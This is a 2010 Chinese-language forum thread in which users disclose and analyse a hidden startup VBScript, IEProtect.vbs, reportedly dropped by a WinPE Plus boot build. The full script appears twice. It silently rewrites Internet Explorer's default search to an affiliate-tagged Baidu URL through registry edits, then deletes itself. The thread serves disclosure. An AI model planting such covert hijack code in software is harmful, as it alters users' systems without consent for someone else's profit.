无忧启动论坛

标题: WinPE Plus's big problem [打印本页]
作者: tanjianwen    时间: 2010-5-16 10:26
标题: WinPE Plus's big problem
Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016


Found a suspicious file after use in system:

%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProtect.vbs
IEProtect.vbs

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide

[ 本帖最后由 tanjianwen 于 2010-5-16 03:30 编辑 ]
作者: lxl1638    时间: 2010-5-16 11:10
原帖由 tanjianwen 于 2010-5-16 10:26 发表
Download from: http://bbs.wuyou.net/forum.php?mod=viewthread&tid=117016


Found a suspicious file after use in system:

%userprofile%\appdata\roaming\Micros~1\Windows\StartM~1\Programs\Startup\IEProte ...


网上找到的,别人的说法,不知对否。


很严重的问题,在启动WinPE后会在“C:\Documents and Settings\All Users\「开始」菜单\程序\启动”生成一个IEProtect.vbs,当你下次进入自己的windows后就会自动运行,内容如下

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes"" /v Version /t REG_DWORD /d 1 /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes"" /v DefaultScope /d {57441393-1EAF-4587-B23F-60B1E960833F} /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v DisplayName /d baidu /f",vbhide
ws.run "cmd /c reg add ""HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{57441393-1EAF-4587-B23F-60B1E960833F}"" /v URL /d ""http://www.baidu.com/baidu?tn=winpe_pg&word={searchTerms}&ie=utf-8"" /f",vbhide
ws.run "cmd /c attrib -s -h -r -a ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs""",vbhide
ws.run "cmd /c del ""%allusersprofile%\「开始」菜单\程序\启动\IEProtect.vbs"" /q",vbhide

从这里面可以看出,它开机自启动后会修改你的注册表,把你的默认搜索引擎换成百度的,并且整个过程是全部隐藏的,运行后会删除自身,所以你现在去“启动”那个文件夹看是看不到这个文件的
但是请注意这里“http://www.baidu.com/baidu?tn=winpe_pg&;word={searchTerms}&ie=utf-8”里面有个tn=winpe_pg,这才是关键所在,如果你不相信,可以进入WinPE,在WinPE中打开C:\Documents and Settings\All Users\「开始」菜单\程序\启动,看看是不是有这个文件

[ 本帖最后由 lxl1638 于 2010-5-16 11:12 编辑 ]
作者: xianglang    时间: 2010-5-16 11:35
没试过这个PE——看来做PE也可以赚钱啊,以前说做PE不赚钱,看来是不对的。 ~Q~~



欢迎光临 无忧启动论坛 (http://bbs.c3.wuyou.net/) Powered by Discuz! X3.3